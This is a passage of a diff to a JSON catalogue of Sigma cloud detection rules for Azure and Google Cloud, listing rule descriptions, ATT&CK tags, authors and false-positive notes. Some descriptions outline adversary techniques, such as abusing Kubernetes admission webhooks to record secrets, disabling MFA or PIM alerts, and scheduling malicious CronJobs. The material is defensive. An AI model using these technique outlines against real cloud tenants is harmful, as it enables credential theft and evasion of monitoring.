"https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ], + "creation_date": "2022/03/24", + "filename": "azure_mfa_denies.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Users actually login but miss-click into the Deny button when MFA prompt." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", + "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", + "value": "Disabled MFA to Bypass Authentication Mechanisms", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1556/", + "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1556" + ], + "creation_date": "2022/02/08", + "filename": "azure_mfa_disabled.yml", + "author": "@ionsor", + "level": "medium", + "falsepositive": [ + "Authorized modification by administrators" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", + "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", + "value": "Multifactor Authentication Interrupted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ], + "creation_date": "2021/10/10", + "filename": "azure_mfa_interrupted.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Firewall Policy is Modified or Deleted.", + "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", + "value": "Azure Network Firewall Policy Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/02", + "filename": "azure_network_firewall_policy_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", + "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", + "value": "Azure Firewall Rule Configuration Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_network_firewall_rule_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", + "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", + "value": "Azure Point-to-site VPN Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a network security configuration is modified or deleted.", + "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", + "value": "Azure Network Security Configuration Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_network_security_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", + "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", + "value": "Azure Virtual Network Device Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_network_virtual_device_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a new cloudshell is created inside of Azure portal.", + "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", + "value": "Azure New CloudShell Created", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2021/09/21", + "filename": "azure_new_cloudshell_created.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "A new cloudshell may be created by a system administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a owner is was removed from a application or service principal in Azure.", + "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", + "value": "Azure Owner Removed From Application or Service Principal", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/09/03", + "filename": "azure_owner_removed_from_application_or_service_principal.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Owner being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", + "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", + "value": "PIM Approvals And Deny Elevation", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2022/08/09", + "filename": "azure_pim_activation_approve_deny.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Actual admin using PIM." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when PIM alerts are set to disabled.", + "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", + "value": "PIM Alert Setting Changes To Disabled", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1484" + ], + "creation_date": "2022/08/09", + "filename": "azure_pim_alerts_disabled.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Administrator disabling PIM alerts as an active choice." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when changes are made to PIM roles", + "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", + "value": "Changes To PIM Settings", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/09", + "filename": "azure_pim_change_settings.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Legit administrative PIM setting configuration changes" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user is added to a privileged role.", + "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", + "value": "User Added To Privilege Role", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/06", + "filename": "azure_priviledged_role_assignment_add.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Legtimate administrator actions of adding members from a role" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.", + "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", + "value": "Bulk Deletion Changes To Privileged Account Permissions", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/05", + "filename": "azure_priviledged_role_assignment_bulk_change.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Legtimate administrator actions of removing members from a role" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a new admin is created.", + "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", + "value": "Privileged Account Creation", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2022/08/11", + "filename": "azure_privileged_account_creation.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", + "level": "medium", + "falsepositive": [ + "A legitimate new admin account being created" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", + "value": "Rare Subscription-level Operations In Azure", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" + ], + "tags": [ + "attack.t1003" + ], + "creation_date": "2020/05/07", + "filename": "azure_rare_operations.yml", + "author": "sawwinnnaung", + "level": "medium", + "falsepositive": [ + "Valid change" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a service principal is created in Azure.", + "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", + "value": "Azure Service Principal Created", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/09/02", + "filename": "azure_service_principal_created.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service principal being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a service principal was removed in Azure.", + "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", + "value": "Azure Service Principal Removed", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/09/03", + "filename": "azure_service_principal_removed.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service principal being removed may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", + "value": "Azure Subscription Permission Elevation Via ActivityLogs", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/11/26", + "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", + "author": "Austin Songer @austinsonger", + "level": "high", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", + "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", + "value": "Azure Subscription Permission Elevation Via AuditLogs", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/11/26", + "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", + "author": "Austin Songer @austinsonger", + "level": "high", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", + "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", + "value": "Azure Suppression Rule Created", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/16", + "filename": "azure_suppression_rule_created.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Suppression Rule being created may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated", + "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", + "value": "Temporary Access Pass Added To An Account", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/10", + "filename": "azure_tap_added.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Administrator adding a legitmate temporary access pass" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when there is a interruption in the authentication process.", + "uuid": "8366030e-7216-476b-9927-271d79f13cf3", + "value": "Azure Unusual Authentication Interruption", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/11/26", + "filename": "azure_unusual_authentication_interruption.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", + "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", + "value": "Users Authenticating To Other Azure AD Tenants", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/06/30", + "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights\u2248 of unauthorizeed login to valid accounts.\n", + "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", + "value": "User Access Blocked by Azure Conditional Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2021/10/10", + "filename": "azure_user_login_blocked_by_conditional_access.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect when a user has reset their password in Azure AD", + "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", + "value": "Password Reset By User Account", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/08/03", + "filename": "azure_user_password_change.yml", + "author": "YochanaHenderson, '@Yochana-H'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator or confirmed user action." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Virtual Network is modified or deleted in Azure.", + "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", + "value": "Azure Virtual Network Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_virtual_network_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a VPN connection is modified or deleted.", + "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", + "value": "Azure VPN Connection Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_vpn_connection_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when storage bucket is enumerated in Google Cloud.", + "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", + "value": "Google Cloud Storage Buckets Enumeration", + "meta": { + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2021/08/14", + "filename": "gcp_bucket_enumeration.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detects when storage bucket is modified or deleted in Google Cloud.", + "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", + "value": "Google Cloud Storage Buckets Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/14", + "filename": "gcp_bucket_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when sensitive information is re-identified in google Cloud.", + "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", + "value": "Google Cloud Re-identifies Sensitive Information", + "meta": { + "refs": [ + "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ], + "creation_date": "2021/08/15", + "filename": "gcp_dlp_re_identifies_sensitive_information.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", + "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", + "value": "Google Cloud DNS Zone Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/dns/docs/reference/v1/managedZones", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/15", + "filename": "gcp_dns_zone_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", + "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", + "value": "Google Cloud Firewall Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2021/08/13", + "filename": "gcp_firewall_rule_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", + "Exceptions can be added to this rule to filter expected behavior." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", + "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", + "value": "Google Full Network Traffic Packet Capture", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074" + ], + "creation_date": "2021/08/13", + "filename": "gcp_full_network_traffic_packet_capture.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Full Network Packet Capture may be done by a system or network administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", + "value": "Google Cloud Kubernetes Admission Controller", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ], + "creation_date": "2021/11/25", + "filename": "gcp_kubernetes_admission_controller.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", + "value": "Google Cloud Kubernetes CronJob", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + 